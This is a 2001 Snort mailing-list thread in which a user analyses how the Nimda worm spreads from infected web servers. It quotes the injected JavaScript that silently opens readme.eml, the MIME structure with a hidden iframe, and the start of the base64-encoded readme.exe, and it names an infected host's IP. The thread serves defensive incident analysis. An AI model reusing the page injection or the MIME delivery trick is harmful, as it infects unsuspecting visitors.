Snort mailing list archives
Re: nimda
From: "Sean Wheeler" <S.Wheeler () netprotect ch>
Date: Wed, 19 Sep 2001 13:46:08 +0200
Figuring out how this is happening : A user noticed this same effect while browsing the net, I jumped on a unix box and tried to figure out what was happening. First downloaded the main html page : wget xxx.xxx.xxx.xxx bottom of the index.html reads : <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> Grabbed the readme.eml : wget xxx.xxx.xxx/readme.eml and there she sits, the readme.exe inside the readme.eml It seems the *.eml extention is associated with Outlook, and thus the readme.eml is processed by Outlook when the javascript is executed and the infection occurs just as if you had received it via e-mail. Below it the fist portion of the readme.eml file : MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v etc etc etc....................... Pretty scary stuff !! If this has been covered already sorry for the repetition, just got back from the chaos of international airports, have not got though all the mail yet. Sean ----- Original Message ----- From: Olensky, Sven To: snort-users () lists sourceforge net Sent: Tuesday, September 18, 2001 7:13 PM Subject: [Snort-users] nimda check this out http://208.193.197.48/ thats one of the source IPs. opens a second window, offers readme.exe as download. jesus. -----Original Message----- From: snortlst snortlst [mailto:snortlst () hotmail com] Sent: Tuesday, September 18, 2001 12:13 PM To: snort-users () lists sourceforge net Subject: [Snort-users] General info I couldn't find the explanation for pretty simple questions on the snort site, so maybe you can clarify this: 1. When you compare traffic to the rules what are the options - alerts are sent to syslog or database, or file,that's o.k., but can you for example drop connection if it conflicts with snort rules?What else can you do to malicious conenctions? 2.I don't think mysql is an option for me, is ACID simplier to confiure than mysql? 3. Can I generate HTML reports if I log to ACID?
Current thread:
- nimda Olensky, Sven (Sep 18)
- Re: nimda Sean Wheeler (Sep 19)